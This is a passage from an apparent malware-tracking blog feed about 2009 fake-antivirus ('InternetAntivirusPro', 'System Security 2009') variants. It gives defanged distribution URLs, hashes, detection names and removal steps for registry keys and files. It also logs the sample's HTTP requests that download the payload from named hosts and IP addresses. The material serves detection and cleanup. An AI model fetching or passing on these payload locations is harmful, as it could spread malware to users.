(18.92%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;  &lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ!IK&lt;/span&gt;&lt;/td&gt;  &lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;HEUR/Crypted&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Antivir&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert.IK&lt;/span&gt;&lt;/td&gt;&lt;td&gt;AVG&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt; Ikarus&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.LooksLike.PCK.Tdss&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;VirTool:Win32/Obfuscator.DQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="20"&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td width="18"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://scan4open.com/22/?uid=keyin&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://scan4open.com/download/install.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_nombre3"&gt;install.exe&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;40960 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;2ecba36cd9af4a8c47b2f0423db7c8d6&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1c6a602b79e8342b449fc3cb78a104c3d" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=2ecba36cd9af4a8c47b2f0423db7c8d6" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/b0437b49932988544a9aa4f962c38256" target="_blank"&gt;VirusTotal Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;03.29.2009 04:29:12 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;6/39 (15.39%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert.IK&lt;/span&gt;&lt;/td&gt;&lt;td&gt;AVG&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt; Ikarus&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.LooksLike.PCK.Tdss&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;VirTool:Win32/Obfuscator.DQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="20"&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td width="18"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://scan4plus.info/?uid=12404&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://scan4plus.info/download/install.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_nombre4"&gt;install.exe&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;40960 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;0471c7f12fa9074bd14a5a4b1393e670&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=10bffeb345340a99425f595791abc8ea2" target="_blank"&gt;Anubis Report&lt;/a&gt; (Ikarus: Trojan.Win32.FakeSpyguard (Sig-Id:469235))&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=0471c7f12fa9074bd14a5a4b1393e670" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/3737d83688b4ea45deceaf49a2c2baba" target="_blank"&gt;VirusTotal Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;03.29.2009 23:44:36 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;5/38 (13.13%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt; Ikarus&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.LooksLike.PCK.Tdss&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;VirTool:Win32/Obfuscator.DQ&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Result when running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci2Mi6U42I/AAAAAAAAALo/rRIZeZjXBc8/s1600-h/scan4any.bmp"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 60px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci2Mi6U42I/AAAAAAAAALo/rRIZeZjXBc8/s320/scan4any.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5316699686757000034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;HTTP Request: 66.197.154.198:80 - [in6ik.com] &lt;br /&gt;Request: GET /download/InternetAntivirusPro.exe&lt;br /&gt;  &lt;br /&gt;  File size: 1939663 bytes&lt;br /&gt;  MD5: d0e1c85deed607184fb5b3eb3fe5bf1a  &lt;br /&gt;    &lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=d0e1c85deed607184fb5b3eb3fe5bf1a"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;    &lt;a href="http://www.virustotal.com/analisis/c75501f3a9dc7e72ce37bbf304822e1f"&gt;VirusTotal Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;***************&lt;br /&gt;&lt;br /&gt;HTTP Request: 78.159.101.27:80 - [in4iz.com] &lt;br /&gt;    Request: GET /download/InternetAntivirusPro.exe&lt;br /&gt;    &lt;br /&gt; File size: 2160737 bytes&lt;br /&gt;MD5: 1e1c910953bf69e6dc02e1ad956b99c9&lt;br /&gt;&lt;br /&gt;Only Sophos detect this new variant!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=1e1c910953bf69e6dc02e1ad956b99c9"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/4157384a64180ab941a57a0f8f3d94bc"&gt;VirusTotal Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;****************&lt;br /&gt;&lt;br /&gt;HTTP Request: 62.211.68.12:80 - [xoomer.virgilio.it] &lt;br /&gt;Request: GET /tatatro/InternetAntivirusPro.exe &lt;br /&gt;&lt;br /&gt; File size: 2160769 bytes&lt;br /&gt;MD5: 4ca7119843d27c1bd3ad327b1dbb93cb&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=4ca7119843d27c1bd3ad327b1dbb93cb"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/4315641d55b1fc994bc82a2e86fcc521"&gt;VirusTotal Report&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;  &lt;td width="20"&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td width="18"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Win32.MalFakeAV.m&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert-AB&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert-AB&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee+Artemis&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Mal/FakeAV-M&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Sophos&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Adware.IAPro.R.1939663&lt;/span&gt;&lt;/td&gt;&lt;td&gt;ViRobot&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="border:solid 1px #0C0; width:520px; padding:10px"&gt;Some removal information can be found below&lt;br /&gt;&lt;br /&gt;- &lt;u&gt;Kill processes&lt;/u&gt;: &lt;b&gt;*random  file name*.exe&lt;/b&gt;, &lt;b&gt;SystemSecurity.exe, av.exe, InternetAntivirusPro.exe&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;- &lt;u&gt;Delete registry keys&lt;/u&gt;:&lt;br /&gt;&lt;ul&gt;  &lt;li&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\&lt;br /&gt;CurrentVersion\Uninstall\SystemSecurity2009 &lt;/li&gt;  &lt;li&gt;HKEY_LOCAL_MACHINE\SOFTWARE\ [random file.exe*]&lt;br /&gt;  &lt;/li&gt;&lt;/ul&gt;* random filename/random name: 8 digit like 00309781.exe&lt;br /&gt;&lt;br /&gt;- &lt;u&gt;Delete registry values&lt;/u&gt;:&lt;br /&gt;&lt;ul&gt;  &lt;li&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&lt;br /&gt;&lt;br /&gt;{random key name *} = &amp;quot;&amp;quot; &lt;br /&gt;&lt;br /&gt;random file name * = &amp;quot;%CommonAppData%\*random filename*\*random filename*.exe&amp;quot;&lt;br /&gt;&lt;br /&gt;  &lt;/li&gt;  &lt;li&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\&lt;br /&gt;Uninstall\SystemSecurity2009]&lt;br /&gt;&lt;br /&gt;DisplayName = &amp;quot;System Security 2009&amp;quot; &lt;br /&gt;&lt;br /&gt;ShortcutPath = &amp;quot;%Programs%\System Security\&lt;br /&gt;System Security 2009 Support.lnk&amp;quot; &lt;br /&gt;&lt;br /&gt;UninstallString = &amp;quot;%Programs%\System Security\System Security 2009 Support.lnk&amp;quot; &lt;br /&gt;&lt;br /&gt;DisplayIcon = &amp;quot;%CommonAppData%\*random file name*\*random filename.exe*,0&amp;quot; &lt;br /&gt;&lt;br /&gt;  &lt;/li&gt;  &lt;li&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\00309781]&lt;br /&gt;&lt;br /&gt;pc*random 8-digit*ins = 0x00000001 &lt;/li&gt;&lt;/ul&gt;* random key name: &lt;br /&gt;32 alpha-numeric value  like 90BF8224-CD63-4081-A4C7-EF9A2CF6596F&lt;br /&gt;&lt;br /&gt;* random 8-digit: &lt;br /&gt;8 digit value like pc00309781ins &amp;quot;The same number of the executable&amp;quot;&lt;br /&gt;&lt;br /&gt;- &lt;u&gt;Delete files and folders&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;&lt;ul style="list-style-type:none"&gt;  &lt;li&gt;► %CommonAppData%\*random name*\pc*random 8-digit*ins &lt;/li&gt;  &lt;li&gt;► %CommonAppData%\*random name*&lt;br /&gt;► %DesktopDir%\System Security 2009.lnk &lt;br /&gt;► %Programs%\System Security\&lt;/li&gt;  &lt;li&gt;► %Programs%\System Security\System Security 2009 Support.lnk &lt;br /&gt;► %Programs%\System Security\System Security 2009 Support.lnk&lt;br /&gt;► %Programs%\System Security\System Security 2009.lnk &lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8285373162434627527?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8285373162434627527'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8285373162434627527'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/internetantiviruspro-spyware-spread-new.html' title='InternetAntivirusPro Spyware spread new variants'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s72-c/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-8837948112905438335</id><published>2009-03-24T06:58:00.000-07:00</published><updated>2009-03-24T07:04:22.195-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='best-click-scanner.info'/><category scheme='http://www.blogger.com/atom/ns#' term='av-click-site.info'/><category scheme='http://www.blogger.com/atom/ns#' term='Spyware.IEMonster.b'/><category scheme='http://www.blogger.com/atom/ns#' term='Rogue AntiSpyware'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus2010'/><category 